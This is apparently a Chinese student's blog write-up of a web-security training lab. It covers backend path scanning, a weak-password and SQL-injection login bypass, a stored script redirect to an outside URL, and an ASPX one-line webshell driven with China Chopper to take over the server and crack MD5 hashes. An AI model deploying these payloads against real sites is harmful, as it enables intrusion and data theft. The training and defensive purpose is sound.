0
点赞
收藏
分享

微信扫一扫

4.18实训有感

624c95384278 2022-04-18 阅读 53
经验分享

实训实验背景

局域网查看工具可扫描指定网段并探查共享文件,同时监控网络内所有主机的在线情况。
漏洞扫描是指基于漏洞数据库,通过扫描等手段对指定的远程或者本地计算机系统的安全脆弱性进行检测,发现可利用的漏洞的一种安全检测(渗透攻击)行为。配备漏洞扫描系统,网络管理人员可以定期的进行网络安全检测服务,安全检测可帮助客户最大可能的消除安全隐患,尽可能早地发现安全漏洞并进行修补,有效的利用已有系统,优化资源,提高网络的运行效率。
端口扫描是指向目标主机发送一组端口扫描消息,并了解其提供的计算机网络服务类型(这些网络服务均与端口号相关)。端口扫描是计算机解密高手喜欢的一种方式。攻击者可以通过它了解到从哪里可探寻到攻击弱点。实质上,端口扫描包括向每个端口发送消息,一次只发送一个消息。接收到的回应类型表示是否在使用该端口并且可由此探寻弱点。扫描器是一种自动检测远程或本地主机安全性弱点的程序,通过使用扫描器你可以不留痕迹的发现远程服务器的各种TCP端口的分配及提供的服务和它们的软件版本。这就能让我们间接的或直观的了解到远程主机所存在的安全问题。
后台扫描即搜寻网站可能的后台入口,字典扫描是常用的一种Web目录扫描方法,类似于暴力破解,扫描结果是否理想取决于字典的大小。

实训准备:在windows上部署一个IIS web服务

首先在此电脑桌面快捷方式上右击进行服务的开启(程序和功能-启用或关闭windows功能)。开启INS中的万维网服务和WEB管理工具
在这里插入图片描述
注意:这时候选择赋选框的时候不能仅仅选择最外层的文件,而是要选择所有该文件名下的所有的赋选框。
可以在cmd中输入:
"%WINDIR%\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" -iru -enable
在计算机管理-服务里开启asp.net服务
在这里插入图片描述
如使用64位的windows系统需要应用程序池设置32位应用程序为true。
在这里插入图片描述

实训任务:Web扫描

这一步的相关操作都是老师自己通过实操讲解的:一般对于相关网站的后台管理员的名称及密码都容易设置为浅显易懂有实在意义的名称比如admin,网页的后台地址也容易设置为admin、long in等。
这时候可利用网站后台扫描工具御剑进行扫描进行域名的破解。大概步骤如下:
1、打开御剑后台扫描工具,输入要扫描的网站域名。
2、线程选择2-4个,点击开始扫描。
3、等待扫描结果。
具体结果因为本人没有实操所以就不展示了qwq

实训任务:漏洞利用

网站后台绕过
1、猜测网站的后台管理地址或使用御剑孤独后台扫描工具暴力搜索进入后台登录界面。
后台网址避免使用常见名称,防止被轻易猜到
2、尝试使用弱密码登录系统,观察登陆界面给出的反馈。
管理员账号避免使用默认账号如admin、administrator、root、sa等,管理员密码避免使用弱口令如admin、123456、qwerty等。即便是像我这种学计算机的菜鸟也很容易猜出来后台登录用户名是admin,然后简单试了几个密码比如:“admin”、“123456”就很容易地使用密码“admin”成功登录后台的管理页面。
3、输入一些特殊字符,如‘’/±=等,点击登录,观察系统反馈。
构造符合语法规则的永真sql绕过登陆验证,利用单引号’闭合确保语法正确,然后构造1=1等永真判断
4、根据登录界面给出的反馈构造永真的SQL语句绕过登录界面。
用户可以提交信息的地方往往存在风险
5、进入网站后台管理界面。
所有问题的根源在于软件开发过程中没有进行充分的特殊字符过滤
篡改页面内容
1、在网站前台或后台中寻找能够提交信息的合适位置。
在线留言版块的提交留言位置可以不用注册用户信息就可以将信息提交到后台
2、提交代码,使用另外的主机访问此网站,观察效果。
图片是老师的~我没有在本机上操作
3、提交代码:<script>window.location.href="http://d.mytanwan.com/h/26026.html"</script>,观察效果。
这里也省略咯、、

实训任务:上传后门程序(木马)并控制目标主机

一句话木马的使用
1、新建文本文档,将文件后缀修改为aspx,书写内容如下:
<%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%>

2、在系统中寻找文件上传点。
3、上传之前创建的aspx一句话木马文件。
4、设法获得上传文件在网站目录中的文件名称和路径。
是所上传在后台友情链接中图片的路径
5、利用中国菜刀工具连接一句话木马(密码为pass)。
这也是老师的图~
6、获得目标服务器的操作权限并拿到数据库文件。
数据库文件中的信息

7、对数据库中的账号密码进行解密。
随便在网上找一个MD5解密网页就可以

为什么password不是admin?用户口令是密文存储的

今天的实训就到此为止咯!

举报

相关推荐

实训周记(4.18)

实训5.3

实训4.1

实训5.2

坦克实训

项目实训(三)

hadoop实训心得

Python实训题目

0 条评论